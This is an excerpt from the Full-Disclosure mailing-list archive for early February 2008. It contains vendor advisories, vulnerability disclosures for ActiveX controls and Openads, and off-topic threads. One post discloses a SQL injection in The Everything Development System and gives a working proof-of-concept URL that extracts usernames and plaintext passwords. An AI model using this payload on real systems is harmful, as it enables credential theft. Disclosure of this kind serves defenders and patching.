2007.1/i586/ruby-gnomecanvas2-0.16.0-2.1mdv2007.1.i586.rpm 92172ccc8d65303cf93cfa41b5efff5e 2007.1/i586/ruby-gnomeprint2-0.16.0-2.1mdv2007.1.i586.rpm 2111cd9707313863766dd2c1b74e36f2 2007.1/i586/ruby-gnomeprintui2-0.16.0-2.1mdv2007.1.i586.rpm edf0aab0f5a89b5e8e28246396815415 2007.1/i586/ruby-gnomevfs2-0.16.0-2.1mdv2007.1.i586.rpm dc83948dfc0a1d7f416f3e42efbbfb43 2007.1/i586/ruby-gtk2-0.16.0-2.1mdv2007.1.i586.rpm 76091b3b0e477d3417bd718f69a69797 2007.1/i586/ruby-gtkglext-0.16.0-2.1mdv2007.1.i586.rpm 1190afad40daba0b01709adb8e2d2138 2007.1/i586/ruby-gtkhtml2-0.16.0-2.1mdv2007.1.i586.rpm 434e7bccc392ba94168d46118dbdeedc 2007.1/i586/ruby-gtkmozembed-0.16.0-2.1mdv2007.1.i586.rpm 98e15cc9bee4fff03ea0d91803158420 2007.1/i586/ruby-gtksourceview-0.16.0-2.1mdv2007.1.i586.rpm 33f73da45a85653a02ab3eee9d4f920a 2007.1/i586/ruby-libart2-0.16.0-2.1mdv2007.1.i586.rpm 756088dd657a3a49f214e40953343fcb 2007.1/i586/ruby-libglade2-0.16.0-2.1mdv2007.1.i586.rpm 9c758d58dcbbf5d2d06775c2bb371f04 2007.1/i586/ruby-panelapplet2-0.16.0-2.1mdv2007.1.i586.rpm 8a3778c105d24a9419423c213bd5b488 2007.1/i586/ruby-pango-0.16.0-2.1mdv2007.1.i586.rpm 822079051a8600a0f92c67eb81cca1ce 2007.1/i586/ruby-poppler-0.16.0-2.1mdv2007.1.i586.rpm 16a45b8fbe47d39ed6ab9f5036edfb4b 2007.1/i586/ruby-rsvg2-0.16.0-2.1mdv2007.1.i586.rpm 3447bb03c4c687245b804c6772ee23c0 2007.1/i586/ruby-vte-0.16.0-2.1mdv2007.1.i586.rpm 316fffbb8ae34ab33d1466e53162d9cb 2007.1/SRPMS/ruby-gnome2-0.16.0-2.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 6b0e32102841662bf5839873c9d73410 2007.1/x86_64/ruby-atk-0.16.0-2.1mdv2007.1.x86_64.rpm 60ac413ae03fe7089afe63eee87e1a8e 2007.1/x86_64/ruby-gconf2-0.16.0-2.1mdv2007.1.x86_64.rpm 8dec4401c84e50482e705f1529d1c762 2007.1/x86_64/ruby-gdkpixbuf2-0.16.0-2.1mdv2007.1.x86_64.rpm 5f34499daabdc2046e1abf77a958efe2 2007.1/x86_64/ruby-glib2-0.16.0-2.1mdv2007.1.x86_64.rpm 9f4b0565ee905d750084b3cb1739ee44 2007.1/x86_64/ruby-gnome2-0.16.0-2.1mdv2007.1.x86_64.rpm 8bdacb4c30a0831af066d9bbf6de0f37 2007.1/x86_64/ruby-gnome2-devel-0.16.0-2.1mdv2007.1.x86_64.rpm 096c7a4da1bdb5c92a13ec25d16ed123 2007.1/x86_64/ruby-gnomecanvas2-0.16.0-2.1mdv2007.1.x86_64.rpm 8cc4dcea3e798918d43a705dcb3cf715 2007.1/x86_64/ruby-gnomeprint2-0.16.0-2.1mdv2007.1.x86_64.rpm bcf1a516343c192e1aa888bda84918c2 2007.1/x86_64/ruby-gnomeprintui2-0.16.0-2.1mdv2007.1.x86_64.rpm e0f2ac6e61c0f49cf0cea241542db6af 2007.1/x86_64/ruby-gnomevfs2-0.16.0-2.1mdv2007.1.x86_64.rpm 413453661c97ffef74a7cd002d68ef8c 2007.1/x86_64/ruby-gtk2-0.16.0-2.1mdv2007.1.x86_64.rpm 91b5a56fecf908eb741ae906b9a5fd53 2007.1/x86_64/ruby-gtkglext-0.16.0-2.1mdv2007.1.x86_64.rpm eca80921ff0260244a5d9419b9f44a77 2007.1/x86_64/ruby-gtkhtml2-0.16.0-2.1mdv2007.1.x86_64.rpm 053fb91f3e23642527ff49ad662b52bc 2007.1/x86_64/ruby-gtkmozembed-0.16.0-2.1mdv2007.1.x86_64.rpm 2678231063f53e22127e05e5fbfd276f 2007.1/x86_64/ruby-gtksourceview-0.16.0-2.1mdv2007.1.x86_64.rpm 9feab2c5af54a7f44e2163b82d64032e 2007.1/x86_64/ruby-libart2-0.16.0-2.1mdv2007.1.x86_64.rpm 5364298efb07553a27555160db0dd249 2007.1/x86_64/ruby-libglade2-0.16.0-2.1mdv2007.1.x86_64.rpm eb7d1481852b3538dd0e9c4c0fa10b0c 2007.1/x86_64/ruby-panelapplet2-0.16.0-2.1mdv2007.1.x86_64.rpm 140949b575299e5a0db4c779872e843b 2007.1/x86_64/ruby-pango-0.16.0-2.1mdv2007.1.x86_64.rpm e4d0011c09d27226108b5ded5736c668 2007.1/x86_64/ruby-poppler-0.16.0-2.1mdv2007.1.x86_64.rpm e22ad59b1ddb3da7365a5bfe5fab05c3 2007.1/x86_64/ruby-rsvg2-0.16.0-2.1mdv2007.1.x86_64.rpm cd0596a1c344e2b7fd4f77fddbd1350c 2007.1/x86_64/ruby-vte-0.16.0-2.1mdv2007.1.x86_64.rpm 316fffbb8ae34ab33d1466e53162d9cb 2007.1/SRPMS/ruby-gnome2-0.16.0-2.1mdv2007.1.src.rpm Mandriva Linux 2008.0: 8307750bd147672c60eea024629b3f2f 2008.0/i586/ruby-atk-0.16.0-3.1mdv2008.0.i586.rpm 4ede1f2646c69713f70e31cc12412fb1 2008.0/i586/ruby-gconf2-0.16.0-3.1mdv2008.0.i586.rpm 49da66f60cabd54e56fd6c5b1785689f 2008.0/i586/ruby-gdkpixbuf2-0.16.0-3.1mdv2008.0.i586.rpm 59a96dc934dfe93152ec491ad626183a 2008.0/i586/ruby-glib2-0.16.0-3.1mdv2008.0.i586.rpm 88dd3349f5d87eb514473d7d7ff04393 2008.0/i586/ruby-gnome2-0.16.0-3.1mdv2008.0.i586.rpm 6f61c8b4630791f6a2385cd64898f3d9 2008.0/i586/ruby-gnome2-devel-0.16.0-3.1mdv2008.0.i586.rpm 53ad3fcf39a69b734354c3869edc43c6 2008.0/i586/ruby-gnomecanvas2-0.16.0-3.1mdv2008.0.i586.rpm 56e31a8e492e5ed4cd62309addf3b393 2008.0/i586/ruby-gnomeprint2-0.16.0-3.1mdv2008.0.i586.rpm 8cf2869ae0851f923656de566a8d7d10 2008.0/i586/ruby-gnomeprintui2-0.16.0-3.1mdv2008.0.i586.rpm 78117f7fc39b38fc2493876f9ed9258e 2008.0/i586/ruby-gnomevfs2-0.16.0-3.1mdv2008.0.i586.rpm edeabe7eef8a91a66654314dc116a67a 2008.0/i586/ruby-gtk2-0.16.0-3.1mdv2008.0.i586.rpm 8bea81137fae5d017bda7b5643f977df 2008.0/i586/ruby-gtkglext-0.16.0-3.1mdv2008.0.i586.rpm f1733e1ce8b042a7a653015a71765f17 2008.0/i586/ruby-gtkhtml2-0.16.0-3.1mdv2008.0.i586.rpm 02e73422c69226f0b8365ccd1434630f 2008.0/i586/ruby-gtkmozembed-0.16.0-3.1mdv2008.0.i586.rpm f41c6f51ada9ab5c662edd5e86fdc3fc 2008.0/i586/ruby-gtksourceview-0.16.0-3.1mdv2008.0.i586.rpm 412809b7df4bf120821d847acf784f31 2008.0/i586/ruby-libart2-0.16.0-3.1mdv2008.0.i586.rpm d790e25de85766d985a00e3296ababbc 2008.0/i586/ruby-libglade2-0.16.0-3.1mdv2008.0.i586.rpm 9b4b2cd7a0fe9ccc71c23fe79696316c 2008.0/i586/ruby-panelapplet2-0.16.0-3.1mdv2008.0.i586.rpm 62847d04d24d38a3f524ce2d4750e92e 2008.0/i586/ruby-pango-0.16.0-3.1mdv2008.0.i586.rpm 568d13371026bd18b7a7de8e5a1b6790 2008.0/i586/ruby-poppler-0.16.0-3.1mdv2008.0.i586.rpm 9b7bb617c47787c1768ce6e41dfff985 2008.0/i586/ruby-rsvg2-0.16.0-3.1mdv2008.0.i586.rpm 70bb27ffb7ee95fec71c84408210adce 2008.0/i586/ruby-vte-0.16.0-3.1mdv2008.0.i586.rpm 0df7cde4331837fb6862c9b5a97be8f5 2008.0/SRPMS/ruby-gnome2-0.16.0-3.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: f994bb06d1aeea684703e4632dc83514 2008.0/x86_64/ruby-atk-0.16.0-3.1mdv2008.0.x86_64.rpm aa09b9d481302f67ceb70212331a404d 2008.0/x86_64/ruby-gconf2-0.16.0-3.1mdv2008.0.x86_64.rpm e2095aad322140ca87c2abaa36383bf6 2008.0/x86_64/ruby-gdkpixbuf2-0.16.0-3.1mdv2008.0.x86_64.rpm 8599aa977cce023e95e3d4013081bd46 2008.0/x86_64/ruby-glib2-0.16.0-3.1mdv2008.0.x86_64.rpm e842e5a9cd8f4ddf65adc3ca537a23e2 2008.0/x86_64/ruby-gnome2-0.16.0-3.1mdv2008.0.x86_64.rpm 7df090f82bc32da5d71e5b1a01a936da 2008.0/x86_64/ruby-gnome2-devel-0.16.0-3.1mdv2008.0.x86_64.rpm e009fc40831dcb1266168475e3f7a7ce 2008.0/x86_64/ruby-gnomecanvas2-0.16.0-3.1mdv2008.0.x86_64.rpm dbcf26f9d25b208cda61be393420249a 2008.0/x86_64/ruby-gnomeprint2-0.16.0-3.1mdv2008.0.x86_64.rpm 39b325ee6548bdace767db805bf2c8b2 2008.0/x86_64/ruby-gnomeprintui2-0.16.0-3.1mdv2008.0.x86_64.rpm 7071eb94ac3c55e18d70519e6c8eca86 2008.0/x86_64/ruby-gnomevfs2-0.16.0-3.1mdv2008.0.x86_64.rpm e2804b2ea0e09a9ceb10a301b588dc16 2008.0/x86_64/ruby-gtk2-0.16.0-3.1mdv2008.0.x86_64.rpm 9de7b27a7af2a97858712ecc85556c23 2008.0/x86_64/ruby-gtkglext-0.16.0-3.1mdv2008.0.x86_64.rpm 707ef739d27ff5e0dac19ddb1ef6eb0c 2008.0/x86_64/ruby-gtkhtml2-0.16.0-3.1mdv2008.0.x86_64.rpm 8a93344a6ce2757ef2a9c69f80ab38cc 2008.0/x86_64/ruby-gtkmozembed-0.16.0-3.1mdv2008.0.x86_64.rpm 0d56132f28b59eb54e915d215934d668 2008.0/x86_64/ruby-gtksourceview-0.16.0-3.1mdv2008.0.x86_64.rpm 0757a4b6ecf07630d45e508cd623f562 2008.0/x86_64/ruby-libart2-0.16.0-3.1mdv2008.0.x86_64.rpm a959f2d58f667ab56874fe974cbdb38a 2008.0/x86_64/ruby-libglade2-0.16.0-3.1mdv2008.0.x86_64.rpm 93dff79288e4e248f7ff42d9574dcb6b 2008.0/x86_64/ruby-panelapplet2-0.16.0-3.1mdv2008.0.x86_64.rpm ab701b2b9942d6834bef8f6e4723a27b 2008.0/x86_64/ruby-pango-0.16.0-3.1mdv2008.0.x86_64.rpm 17580801211d70f93579bfa6b36f10d8 2008.0/x86_64/ruby-poppler-0.16.0-3.1mdv2008.0.x86_64.rpm 21e8b9751a77135296f537e33006bc5a 2008.0/x86_64/ruby-rsvg2-0.16.0-3.1mdv2008.0.x86_64.rpm 91f4b51df125d5c184a2272cb2561d3c 2008.0/x86_64/ruby-vte-0.16.0-3.1mdv2008.0.x86_64.rpm 0df7cde4331837fb6862c9b5a97be8f5 2008.0/SRPMS/ruby-gnome2-0.16.0-3.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFHo38WmqjQ0CJFipgRAuQ1AJkB4lvv5eqDT1xFB+zuFDSNT5dicwCfX5fT tvrLJzPSQ/JsXO2WAEf6QSY= =D1lc -----END PGP SIGNATURE----- From sub at room641a.net Fri Feb 1 21:56:38 2008 From: sub at room641a.net (sub) Date: Fri, 01 Feb 2008 16:56:38 -0500 Subject: [Full-disclosure] The Everything Development System - SQL Injection Message-ID: <47A39596.3010402@room641a.net> Application: The Everything Development System Version(s): <= Pre-1.0 (current version at time of release) Author: sub < sub at room641a.net > Released: 2/1/2008 There exists a vulnerability in The Everything Development Engine that allows a user to inject their own SQL to modify a SELECT query, leading to information disclosure, XSS, or privilege escalation. What's more, passwords are stored in the database as plaintext, making user accounts very easily compromised. In some versions of the software I have encountered, the following proof of concept will display a corresponding username and password in the "core" field and "reputation" field on the page, respectively. Proof of Concept: http://path.to/cms/index.pl?node_id=0/**/UNION/**/SELECT/**/null,101,null,1,null,null,passwd,null,null,nick,null/**/FROM/**/user/**/WHERE/**/nick/**/!%3d/**/''/**/%23 In other, probably more recent versions, a 13-column query is required or the UNION. What does not change, is that of all of the various versions I've encountered, all are vulnerable to SQL injection. The ideal fix would be to ensure that the 'node_id' request variable is the appropriate data-type (signed int) before passing it as part of a SQL query. Vendor Status: A private ticket was created on the vendors Bug Tracker page prior to this release. However, I have decided to release this vulnerability without a reply from the vendor as the Bug Tracker, and development project, seemed to be 'abandonded.' From gmaggro at rogers.com Sat Feb 2 17:14:06 2008 From: gmaggro at rogers.com (gmaggro) Date: Sat, 02 Feb 2008 12:14:06 -0500 Subject: [Full-disclosure] undersea cable cut and internet problem! In-Reply-To: <4ef5fec60802011423u4d825486jbff63ba5ad5b4fdd@mail.gmail.com> References: <41011d980801310805laadfd17oe7e85a521aafc8cc@mail.gmail.com> <4ef5fec60802011423u4d825486jbff63ba5ad5b4fdd@mail.gmail.com> Message-ID: <47A4A4DE.3010600@rogers.com> > i am curious if the congestion / outages to some of asia / middle east > have had any perceptible impact on bot nets or spam level... Might be to soon to tell, but the graph on mwcollect.org looks like it might correlate ;) From kf_lists at digitalmunition.com Sat Feb 2 17:15:43 2008 From: kf_lists at digitalmunition.com (Kevin Finisterre (lists)) Date: Sat, 2 Feb 2008 12:15:43 -0500 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: <41a9dc560802012013h755b292av3366da9096d591d4@mail.gmail.com> References: <20080201141727.6F18011803C@mailserver5.hushmail.com> <41a9dc560802012013h755b292av3366da9096d591d4@mail.gmail.com> Message-ID: post it here. http://www.tsa.gov/blog -KF From worriedsecurity at googlemail.com Sat Feb 2 18:20:26 2008 From: worriedsecurity at googlemail.com (worried security) Date: Sat, 2 Feb 2008 18:20:26 +0000 Subject: [Full-disclosure] undersea cable cut and internet problem! In-Reply-To: <41011d980801310805laadfd17oe7e85a521aafc8cc@mail.gmail.com> References: <41011d980801310805laadfd17oe7e85a521aafc8cc@mail.gmail.com> Message-ID: <67ea64530802021020h1a5a5df9ge11ab3cda4e01110@mail.gmail.com> On Jan 31, 2008 4:05 PM, crazy frog crazy frog wrote: > http://www.cnn.com/2008/WORLD/meast/01/31/dubai.outage/index.html Although people have probed into the possibilities of false flag government involvement or a terrorist attack on these cables in this incident, it doesn't appear to hold much water with the public after monitoring commentry across the internet. n3td3v post to his news group a day or so ago about an incident, which *was* a terrorist act against internet cables, but isn't related to this case. Interesting all the same. Article teaser snippet: "about four kilometre-length of NITEL's high capacity fibre optic cables were destroyed around Carter Bridge in Lagos when some vandals opened a cable duct, poured inflammable liquid like petrol in the duct and set the cables ablaze. The cables burnt over the night into the early hours of the next day before the site was located by NITEL officials." n3td3v news group link (members only): http://groups.google.com/group/n3td3v/browse_thread/thread/2632bf0a282c7db5 direct link to article (public access): http://allafrica.com/stories/200801310420.html From icetre at digitalfreezer.net Sat Feb 2 18:32:51 2008 From: icetre at digitalfreezer.net (Adam Chesnutt) Date: Sat, 02 Feb 2008 10:32:51 -0800 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: References: <20080201141727.6F18011803C@mailserver5.hushmail.com> <41a9dc560802012013h755b292av3366da9096d591d4@mail.gmail.com> Message-ID: <47A4B753.1000101@digitalfreezer.net> Why would I do this? It's not a TSA policy or setup, I'm pretty sure they don't really care I've duped SWA out of $20 worth of booze. :) Kevin Finisterre (lists) wrote: > post it here. > > http://www.tsa.gov/blog > > -KF > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From kf_lists at digitalmunition.com Sat Feb 2 18:42:58 2008 From: kf_lists at digitalmunition.com (Kevin Finisterre (lists)) Date: Sat, 2 Feb 2008 13:42:58 -0500 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: <47A4B753.1000101@digitalfreezer.net> References: <20080201141727.6F18011803C@mailserver5.hushmail.com> <41a9dc560802012013h755b292av3366da9096d591d4@mail.gmail.com> <47A4B753.1000101@digitalfreezer.net> Message-ID: <97C0C8EA-3849-48F5-A184-2301D57BDE8B@digitalmunition.com> Maybe they won't like the surge in drunk passengers on SWA flights, hell I dunno. =] -KF On Feb 2, 2008, at 1:32 PM, Adam Chesnutt wrote: > Why would I do this? It's not a TSA policy or setup, I'm pretty sure > they don't really care I've duped SWA out of $20 worth of booze. :) > > > Kevin Finisterre (lists) wrote: >> post it here. >> >> http://www.tsa.gov/blog >> >> -KF >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > From joey.mengele at hushmail.com Sat Feb 2 18:59:16 2008 From: joey.mengele at hushmail.com (Joey Mengele) Date: Sat, 02 Feb 2008 13:59:16 -0500 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness Message-ID: <20080202185916.E727C2003A@mailserver7.hushmail.com> Dear Alan, On Fri, 01 Feb 2008 23:13:01 -0500 Adam Chesnutt wrote: >Insightful... Really.. > >I posted about an amusing flaw I found in the systems and policies >of a >public company. > >I have to complement you though, that was a really nice retort.. >Obviously >being clever isn't working out for you.. Maybe you should just >stop. > >If your going to make fun of me, you really should try harder.. >That was >just fail. > LOLOLOL. This is an English speaking list FAIL LOLOLOLOL. >Adam > J -- Become a religous scholar today. Click here for more information. http://tagline.hushmail.com/fc/Ioyw6h4fPOGw9rk7kzBHkWS8YkDnsr6F0Hz5Io8zKpUV2GBkYt9HWA/ "Your an idiot" - Adam Chestnuts From worriedsecurity at googlemail.com Sat Feb 2 20:03:37 2008 From: worriedsecurity at googlemail.com (worried security) Date: Sat, 2 Feb 2008 20:03:37 +0000 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: References: <20080201141727.6F18011803C@mailserver5.hushmail.com> <41a9dc560802012013h755b292av3366da9096d591d4@mail.gmail.com> Message-ID: <67ea64530802021203g4e1626e3qb89a67d0529ab6d3@mail.gmail.com> On Feb 2, 2008 5:15 PM, Kevin Finisterre (lists) wrote: > post it here. > > http://www.tsa.gov/blog > > -KF No seriously don't post it there. Unless you want: a) get the secret services round your door b) get sacked from your company c) get put on the no fly list d) get followed by the intelligence service in your day-to-day life Media coverage involving your suggestion: http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9060458&intsrc=news_ts_head n3td3v strongly suggests *not* posting to the TSA blog under any circumstances, it is being highly monitored by the intelligence services and transport officials. You would only be giving yourself a death wish posting there, even if *you* consider the information useful you post there, for the love of god don't do it! From nytrokiss at gmail.com Sun Feb 3 03:06:17 2008 From: nytrokiss at gmail.com (James Matthews) Date: Sun, 3 Feb 2008 04:06:17 +0100 Subject: [Full-disclosure] A friendly request on behalf of Bart Cilfone In-Reply-To: <4ef5fec60802010119o6d267c2ep1053f04a234fbffc@mail.gmail.com> References: <5f651f2b0801280523j720bd2btbb175c456a180394@mail.gmail.com> <4ef5fec60802010119o6d267c2ep1053f04a234fbffc@mail.gmail.com> Message-ID: <8a6b8e350802021906n4cba37c3vb7caf2aa2b4ae77e@mail.gmail.com> Why don't people read some posts on the list! They will find out that these posts are 1. Worthless 2. Annoy people! On Feb 1, 2008 10:19 AM, coderman wrote: > On Jan 31, 2008 8:00 PM, Fredrick Diggle wrote: > > How much does the reputation Defender charge... > > dude, reputation defender is the shit. > > they are paying me $20 per email to spam > > what a deal!! reputation defender rocks!!!! OMG!!! PWNIES!! > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://search.goldwatches.com/?Search=Movado+Watches http://www.jewelerslounge.com http://www.goldwatches.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080203/82021e09/attachment.html From worriedsecurity at googlemail.com Sun Feb 3 18:32:32 2008 From: worriedsecurity at googlemail.com (worried security) Date: Sun, 3 Feb 2008 18:32:32 +0000 Subject: [Full-disclosure] undersea cable cut and internet problem! In-Reply-To: <67ea64530802021020h1a5a5df9ge11ab3cda4e01110@mail.gmail.com> References: <41011d980801310805laadfd17oe7e85a521aafc8cc@mail.gmail.com> <67ea64530802021020h1a5a5df9ge11ab3cda4e01110@mail.gmail.com> Message-ID: <67ea64530802031032l42be69dbw4c6e6b2fba2d5bf@mail.gmail.com> On Feb 2, 2008 6:20 PM, worried security wrote: > On Jan 31, 2008 4:05 PM, crazy frog crazy frog wrote: > > http://www.cnn.com/2008/WORLD/meast/01/31/dubai.outage/index.html > > > Although people have probed into the possibilities of false flag > government involvement or a terrorist attack on these cables in this > incident, it doesn't appear to hold much water with the public after > monitoring commentry across the internet. > > n3td3v post to his news group a day or so ago about an incident, which > *was* a terrorist act against internet cables, but isn't related to > this case. Interesting all the same. > > Article teaser snippet: > > "about four kilometre-length of NITEL's high capacity fibre optic cables were > destroyed around Carter Bridge in Lagos when some vandals opened a > cable duct, poured inflammable liquid like petrol in the duct and set > the cables ablaze. The cables burnt over the night into the early > hours of the next day before the site was located by NITEL officials." > > n3td3v news group link (members only): > http://groups.google.com/group/n3td3v/browse_thread/thread/2632bf0a282c7db5 > > direct link to article (public access): > http://allafrica.com/stories/200801310420.html > Ships did not cause Internet cable damage: "Damage to undersea Internet cables in the Mediterranean that hit business across the Middle East and South Asia was not caused by ships, Egypt's communications ministry said on Sunday, ruling out earlier reports." n3td3v news group link (members only): http://groups.google.com/group/n3td3v/browse_thread/thread/f615d8a63a37ce55 direct link to article (public access): http://www.khaleejtimes.com/DisplayArticleNew.asp?xfile=data/theworld/2008/February/theworld_February77.xml§ion=theworld&col From elazar at hushmail.com Sun Feb 3 19:36:07 2008 From: elazar at hushmail.com (Elazar Broad) Date: Sun, 03 Feb 2008 19:36:07 +0000 Subject: [Full-disclosure] FaceBook/Aurigma Image/PhotoUploader Buffer Overflow Message-ID: <20080203193607.363742003A@mailserver7.hushmail.com> Who: FaceBook http://www.facebook.com Aurigma http://www.aurigma.com What: FaceBook uses Aurigma's ImageUploader control. This control enables users to upload photos to FaceBook. How: Please note that this vulnerability is DIFFERENT than the one that I previously posted. This also affects the stock Aurigma ImageUploader control. The control is vulnerable to a stack-based buffer overflow in the ExtractExif and ExtractIptc properties. See the exploit code for buffer offsets. Other properties may be vulnerable as well to a DoS and/or code execution. The following controls are vulnerable, other version may be vulnerable as well: {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} FaceBook PhotoUploader 4.5.57.0 {6E5E167B-1566-4316-B27F-0DDAB3484CF7} Aurigma ImageUploader4 4.6.17.0 Aurigma ImageUploader4 4.5.70.0 Aurigma ImageUploader4 4.5.126.0 {BA162249-F2C5-4851-8ADC-FC58CB424243} Aurigma ImageUploader5 5.0.10.0 The following controls are NOT vulnerable: {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} FaceBook PhotoUploader 4.5.57.1 Fix: FaceBook PhotoUploader: Update to 4.5.57.1 Aurigma: No official fix known. Vendor has been notified Workaround: Set the killbit for these controls, see http://support.microsoft.com/kb/240797 Exploit: Code should be posted on milw0rm shortly Elazar -- Click here for free information on how to reduce your debt by filing for bankruptcy. http://tagline.hushmail.com/fc/Ioyw6h4elLzBhoUyndVr9y0FUHMKd5NvFr9ZX2hIQb9ucOEZJnaoSc/ From elazar at hushmail.com Sun Feb 3 23:11:24 2008 From: elazar at hushmail.com (Elazar Broad) Date: Sun, 03 Feb 2008 23:11:24 +0000 Subject: [Full-disclosure] Yahoo! JukeBox MediaGrid ActiveX Control AddBitmap() Buffer Overflow Message-ID: <20080203231124.F0DCA15803D@mailserver6.hushmail.com> Who: Yahoo! http://www.yahoo.com What: mediagrid.dll version 2.2.2.56 {22FD7C0A-850C-4A53-9821-0B0915C96139} Implements IObjectSafety This control is used with the Yahoo! JukeBox application. How: The 2nd parameter of the AddBitmap() method is vulnerable to a buffer overflow. Fix: No official fix known Workaround: Set the killbit for this control, see http://support.microsoft.com/kb/240797 Exploit: http://milw0rm.com/exploits/5052 -- Click for quotes on adjustable mortgages. http://tagline.hushmail.com/fc/Ioyw6h4dOB3cb6dJ2dcFs51ffjQiUKtIWvCZi2vPoyRVHjiVujrapq/ Elazar From QNorth at iso.com Mon Feb 4 15:33:02 2008 From: QNorth at iso.com (North, Quinn) Date: Mon, 4 Feb 2008 10:33:02 -0500 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness In-Reply-To: <4ef5fec60802010137x32effd98gdea0c899eaed99ce@mail.gmail.com> References: <47A28613.3070402@digitalfreezer.net> <4ef5fec60802010137x32effd98gdea0c899eaed99ce@mail.gmail.com> Message-ID: I thought TSA stood for Thousands Standing Around. Yet another super informative TLA (Three Letter Acronym). --=Q=-- -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of coderman Sent: Friday, February 01, 2008 4:37 AM To: Adam Chesnutt Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Southwest Airlines Ticket Silliness HELLO INDIAN On Jan 31, 2008 6:38 PM, Adam Chesnutt wrote: > Not sure if anyone posted this before; But I figured this would interest > you guys... TSA == FULL IF FUCKING IGNORANT FUCKS so this is a kinown vulnerability. what was the question agtain? coderman, pwnder by nbusmillls whiskey _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This email is intended for the recipient only. If you are not the intended recipient please disregard, and do not use the information for any purpose. From derekb at syrex.com Mon Feb 4 16:42:13 2008 From: derekb at syrex.com (Derek Buelna) Date: Mon, 4 Feb 2008 08:42:13 -0800 Subject: [Full-disclosure] Southwest Airlines Ticket Silliness References: <47A28613.3070402@digitalfreezer.net><4ef5fec60802010137x32effd98gdea0c899eaed99ce@mail.gmail.com> Message-ID: It's been hard to fill all those positions in Oregon since we have manned gas stations. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of North, Quinn Sent: Monday, February 04, 2008 7:33 AM To: coderman; Adam Chesnutt Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Southwest Airlines Ticket Silliness I thought TSA stood for Thousands Standing Around. Yet another super informative TLA (Three Letter Acronym). --=Q=-- -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of coderman Sent: Friday, February 01, 2008 4:37 AM To: Adam Chesnutt Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Southwest Airlines Ticket Silliness HELLO INDIAN On Jan 31, 2008 6:38 PM, Adam Chesnutt wrote: > Not sure if anyone posted this before; But I figured this would interest > you guys... TSA == FULL IF FUCKING IGNORANT FUCKS so this is a kinown vulnerability. what was the question agtain? coderman, pwnder by nbusmillls whiskey _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This email is intended for the recipient only. If you are not the intended recipient please disregard, and do not use the information for any purpose. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From php at beccati.com Mon Feb 4 17:47:53 2008 From: php at beccati.com (Matteo Beccati) Date: Mon, 04 Feb 2008 18:47:53 +0100 Subject: [Full-disclosure] [OPENADS-SA-2008-001] Openads 2.4.2 vulnerability fixed Message-ID: <47A74FC9.5000108@beccati.com> ======================================================================== Openads security advisory OPENADS-SA-2008-001 ------------------------------------------------------------------------ Advisory ID: OPENADS-SA-2008-001 Date: 2008-Feb-04 Security risk: Critical Applications affetced: Openads Versions affected: 2.4.0 <= x <= 2.4.2 Versions not affected: >= 2.4.3 ======================================================================== ======================================================================== Vulnerability: Remote PHP code injection and execution ======================================================================== Description ----------- A remote PHP code injection and execution vulnerability has recently been found. The vulnerability affects the delivery engine, which does not require any kind of authentication. An attacker could exploit it to execute arbitrary PHP code. Solution -------- - Upgrade to Openads 2.4.3 Credits ------- - Reporter: Tanatik Contact informations ==================== The security contact for Openads can be reached at: Best regards -- Matteo Beccati http://www.openads.org From jamie at ubuntu.com Mon Feb 4 18:17:28 2008 From: jamie at ubuntu.com (Jamie Strandboge) Date: Mon, 4 Feb 2008 13:17:28 -0500 Subject: [Full-disclosure] [USN-574-1] Linux kernel vulnerabilities Message-ID: <20080204181728.GB8659@lupin.strandboge.com> =========================================================== Ubuntu Security Notice USN-574-1 February 04, 2008 linux-source-2.6.17/20/22 vulnerabilities CVE-2006-6058, CVE-2007-3107, CVE-2007-4567, CVE-2007-4849, CVE-2007-4997, CVE-2007-5093, CVE-2007-5500, CVE-2007-5501, CVE-2007-5966, CVE-2007-6063, CVE-2007-6151, 